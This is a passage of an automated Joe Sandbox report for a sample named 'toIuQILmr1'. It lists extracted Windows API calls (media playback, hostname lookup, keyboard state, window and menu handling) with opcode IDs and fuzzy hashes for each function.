                                            • Part of subcall function 00DD7D2C: _memmove.LIBCMT ref: 00DD7D66
                                            • Part of subcall function 00DD7A84: _memmove.LIBCMT ref: 00DD7B0D
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E355D2
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E355E8
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E355F9
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E3560B
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E3561C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: 08c7709982f98761f6f3f1d689ff4e2d3796bfd86b66a2bcc1853beaa2da4b5d
                                          • Instruction ID: 4b12af0cdce2b17fb06db9cc76a915d1bf8addeb3d41f733973d6488010b2461
                                          • Opcode Fuzzy Hash: 08c7709982f98761f6f3f1d689ff4e2d3796bfd86b66a2bcc1853beaa2da4b5d
                                          • Instruction Fuzzy Hash: 4911542159066A79E720B661DC4ADFF7F7CEF95B00F44147BB409B21D1EE601E05C6B1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: 752ff3c9d09068d6e60f046a0925a2927008d170711f0944b5ffd938fa7d1778
                                          • Instruction ID: e889524f77416f94dbf6e60d9423ece4201d5376fbb578c7f398c75cfcc2b602
                                          • Opcode Fuzzy Hash: 752ff3c9d09068d6e60f046a0925a2927008d170711f0944b5ffd938fa7d1778
                                          • Instruction Fuzzy Hash: F0110871904219AFCB24EB21AC4AFEB7BBCDF40711F054176F504B2191EF709985C671
                                          APIs
                                          • timeGetTime.WINMM ref: 00E3521C
                                            • Part of subcall function 00DF0719: timeGetTime.WINMM(?,75A8B400,00DE0FF9), ref: 00DF071D
                                          • Sleep.KERNEL32(0000000A), ref: 00E35248
                                          • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00E3526C
                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E3528E
                                          • SetActiveWindow.USER32 ref: 00E352AD
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E352BB
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E352DA
                                          • Sleep.KERNEL32(000000FA), ref: 00E352E5
                                          • IsWindow.USER32 ref: 00E352F1
                                          • EndDialog.USER32(00000000), ref: 00E35302
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: b4515f28554864f1d3a3d3a19e68eda3ae19b11bdd030d213b9f9d44c190d4ff
                                          • Instruction ID: 5675ac49a093d1b065fa60f24281e3b6d45a99c47b3b67ff8f68cda9336d0747
                                          • Opcode Fuzzy Hash: b4515f28554864f1d3a3d3a19e68eda3ae19b11bdd030d213b9f9d44c190d4ff
                                          • Instruction Fuzzy Hash: 3C21A471104704AFE7045B32ED8DA263FAAEB4634BF012867F442B22B1DBA19C0CCB61
                                          APIs
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • CoInitialize.OLE32(00000000), ref: 00E3D855
                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00E3D8E8
                                          • SHGetDesktopFolder.SHELL32(?), ref: 00E3D8FC
                                          • CoCreateInstance.COMBASE(00E62D7C,00000000,00000001,00E8A89C,?), ref: 00E3D948
                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00E3D9B7
                                          • CoTaskMemFree.COMBASE(?), ref: 00E3DA0F
                                          • _memset.LIBCMT ref: 00E3DA4C
                                          • SHBrowseForFolderW.SHELL32(?), ref: 00E3DA88
                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00E3DAAB
                                          • CoTaskMemFree.COMBASE(00000000), ref: 00E3DAB2
                                          • CoTaskMemFree.COMBASE(00000000), ref: 00E3DAE9
                                          • CoUninitialize.COMBASE ref: 00E3DAEB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                          • String ID:
                                          • API String ID: 1246142700-0
                                          • Opcode ID: 5e81f07007eebde1945f63cfbefeb02b7fe86f5e6c19cad002351c46f7d80416
                                          • Instruction ID: f3983bf40fc71c484a4fc95c85e8b9311e1cd8eaf9618c8a36607b9fcf67c945
                                          • Opcode Fuzzy Hash: 5e81f07007eebde1945f63cfbefeb02b7fe86f5e6c19cad002351c46f7d80416
                                          • Instruction Fuzzy Hash: E4B1FA75A00219AFDB04DF64D898DAEBBF9EF48304F048469F509EB251DB31ED45CB60
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00E305A7
                                          • SetKeyboardState.USER32(?), ref: 00E30612
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E30632
                                          • GetKeyState.USER32(000000A0), ref: 00E30649
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E30678
                                          • GetKeyState.USER32(000000A1), ref: 00E30689
                                          • GetAsyncKeyState.USER32(00000011), ref: 00E306B5
                                          • GetKeyState.USER32(00000011), ref: 00E306C3
                                          • GetAsyncKeyState.USER32(00000012), ref: 00E306EC
                                          • GetKeyState.USER32(00000012), ref: 00E306FA
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E30723
                                          • GetKeyState.USER32(0000005B), ref: 00E30731
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 9db2c4379cba8684a50a332326cff94f8b3620b0beff1fd42784180b548c6be2
                                          • Instruction ID: 4bf50921d738a0fa7e8cd83fc06eb6db13ac48f6be3820936d9469bb0f9c7d52
                                          • Opcode Fuzzy Hash: 9db2c4379cba8684a50a332326cff94f8b3620b0beff1fd42784180b548c6be2
                                          • Instruction Fuzzy Hash: 3C511B60A0478829FB35EBB088697EABFF49F01384F08559EC5C2765C2DA64DB4CCB56
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 00E2C746
                                          • GetWindowRect.USER32(00000000,?), ref: 00E2C758
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E2C7B6
                                          • GetDlgItem.USER32(?,00000002), ref: 00E2C7C1
                                          • GetWindowRect.USER32(00000000,?), ref: 00E2C7D3
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E2C827
                                          • GetDlgItem.USER32(?,000003E9), ref: 00E2C835
                                          • GetWindowRect.USER32(00000000,?), ref: 00E2C846
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E2C889
                                          • GetDlgItem.USER32(?,000003EA), ref: 00E2C897
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E2C8B4
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00E2C8C1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: 5dbacea45d3f97981ed04dbd40cf3497430f069d0b79b65077a4656d96da0a1e
                                          • Instruction ID: 48b3c97919ba474987f23e78827676207219fb78b878ad63699555d7c1003ef5
                                          • Opcode Fuzzy Hash: 5dbacea45d3f97981ed04dbd40cf3497430f069d0b79b65077a4656d96da0a1e
                                          • Instruction Fuzzy Hash: 5B513171B00205AFDB18CF69DD89AAEBBBAEB88311F14852DF515E7290D7B0AD448B50
                                          APIs
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • GetSysColor.USER32(0000000F), ref: 00DD21D3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ColorLongWindow
                                          • String ID:
                                          • API String ID: 259745315-0
                                          • Opcode ID: 4c1cf165fefb5ec342fa7ed46a35bae31baff1d7db571760da32971a24873044
                                          • Instruction ID: 7cf06800af3bf099daed9bc62cdd47d57bb60db27202afe3e3fe25a34df0ea14
                                          • Opcode Fuzzy Hash: 4c1cf165fefb5ec342fa7ed46a35bae31baff1d7db571760da32971a24873044
                                          • Instruction Fuzzy Hash: 0B41D3310056409FDB255F28DC88BB93B75EB16332F284366FDA59A2E2C7318C82DB75
                                          APIs
                                          • CharLowerBuffW.USER32(?,?,00E5F910), ref: 00E3AB76
                                          • GetDriveTypeW.KERNEL32(00000061,00E8A620,00000061), ref: 00E3AC40
                                          • _wcscpy.LIBCMT ref: 00E3AC6A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy
                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 2820617543-1000479233
                                          • Opcode ID: b0075578f9b9416811bfddf489e11cc16e1592f3e9ceae193d79038985e4a185
                                          • Instruction ID: fa8e7483629fa24df47dfda6210836db4f0d310520ed3e0baf224d1ae9aad79d
                                          • Opcode Fuzzy Hash: b0075578f9b9416811bfddf489e11cc16e1592f3e9ceae193d79038985e4a185
                                          • Instruction Fuzzy Hash: 0751A1311083059FC714EF14C895AAAFBA5EF81304F58682EF5D6672A2DB31DD89CB63
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __i64tow__itow__swprintf
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 421087845-2263619337
                                          • Opcode ID: 139cd1635471e4841f557d08710151ffc94ae8d4a58a4e69237ca65030fb3ecf
                                          • Instruction ID: 688ab3e5a61bfc8f290a407b878e6de51a83d2891c9b5ea4edf16a5165c05735
                                          • Opcode Fuzzy Hash: 139cd1635471e4841f557d08710151ffc94ae8d4a58a4e69237ca65030fb3ecf
                                          • Instruction Fuzzy Hash: CA41F571604209AADB34AB74DC52E76B7E8EF44304F24546FE689E7291EA32D941CB31
                                          APIs
                                          • _memset.LIBCMT ref: 00E573D9
                                          • CreateMenu.USER32 ref: 00E573F4
                                          • SetMenu.USER32(?,00000000), ref: 00E57403
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E57490
                                          • IsMenu.USER32(?), ref: 00E574A6
                                          • CreatePopupMenu.USER32 ref: 00E574B0
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E574DD
                                          • DrawMenuBar.USER32 ref: 00E574E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$F
                                          • API String ID: 176399719-3044882817
                                          • Opcode ID: 414aa0e9976a2b67066082eb7fc940092b80799ad86ba4da69ea3813ac04ec90
                                          • Instruction ID: b611db633722ca590f0d53411655a571fced53c6c8be821aeb423316078b9852
                                          • Opcode Fuzzy Hash: 414aa0e9976a2b67066082eb7fc940092b80799ad86ba4da69ea3813ac04ec90
                                          • Instruction Fuzzy Hash: 0A416A74A00205EFDB24DF65E884E9ABBB5FF49346F14482AED55A7350D730AD28CB60
                                          APIs
                                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E577CD
                                          • CreateCompatibleDC.GDI32(00000000), ref: 00E577D4
                                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E577E7
                                          • SelectObject.GDI32(00000000,00000000), ref: 00E577EF
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E577FA
                                          • DeleteDC.GDI32(00000000), ref: 00E57803
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00E5780D
                                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E57821
                                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E5782D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                          • String ID: static
                                          • API String ID: 2559357485-2160076837
                                          • Opcode ID: 47dbb414834a65e51a7e19e5ec450d5ed28b7268ac6016f4e631ebfb47587a0d
                                          • Instruction ID: e5788ce72d5241246046454fca7542450dfa28061bb8dd62fa10ce93bfb33887
                                          • Opcode Fuzzy Hash: 47dbb414834a65e51a7e19e5ec450d5ed28b7268ac6016f4e631ebfb47587a0d
                                          • Instruction Fuzzy Hash: F231AC31101214AFDF169FA5EC08FDB3B69EF0D326F100A25FA55B20A0C731D829DBA4
                                          APIs
                                          • _memset.LIBCMT ref: 00DF707B
                                            • Part of subcall function 00DF8D68: __getptd_noexit.LIBCMT ref: 00DF8D68
                                          • __gmtime64_s.LIBCMT ref: 00DF7114
                                          • __gmtime64_s.LIBCMT ref: 00DF714A
                                          • __gmtime64_s.LIBCMT ref: 00DF7167
                                          • __allrem.LIBCMT ref: 00DF71BD
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF71D9
                                          • __allrem.LIBCMT ref: 00DF71F0
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF720E
                                          • __allrem.LIBCMT ref: 00DF7225
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF7243
                                          • __invoke_watson.LIBCMT ref: 00DF72B4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                          • Instruction ID: 1116f3b7d783211d8ee22a7eac6c17097e3eb1710324244a92387119eaacdb6d
                                          • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                          • Instruction Fuzzy Hash: DC71BA71A0471BABE7149E79CC417BAB3F8BF14324F19822AF614E66C1EB70D95087B4
                                          APIs
                                          • _memset.LIBCMT ref: 00E32A31
                                          • GetMenuItemInfoW.USER32(00E96890,000000FF,00000000,00000030), ref: 00E32A92
                                          • SetMenuItemInfoW.USER32(00E96890,00000004,00000000,00000030), ref: 00E32AC8
                                          • Sleep.KERNEL32(000001F4), ref: 00E32ADA
                                          • GetMenuItemCount.USER32(?), ref: 00E32B1E
                                          • GetMenuItemID.USER32(?,00000000), ref: 00E32B3A
                                          • GetMenuItemID.USER32(?,-00000001), ref: 00E32B64
                                          • GetMenuItemID.USER32(?,?), ref: 00E32BA9
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E32BEF
                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E32C03
                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E32C24
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 661c3c411d1fbfd505da3dec6eade161e6b042cf74948fe3fe6adc1a1dc0fe56
                                          • Instruction ID: d6a375bc15e032d3c3ef94788e7e7809c8f8d03a1a953d9170ec8f00689f3710
                                          • Opcode Fuzzy Hash: 661c3c411d1fbfd505da3dec6eade161e6b042cf74948fe3fe6adc1a1dc0fe56
                                          • Instruction Fuzzy Hash: DB618FB0900249AFDB21CF64D88CDBEBFB8EB41348F14555EEA81B7251E731AD45DB21
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E57214
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E57217
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E5723B
                                          • _memset.LIBCMT ref: 00E5724C
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E5725E
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E572D6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
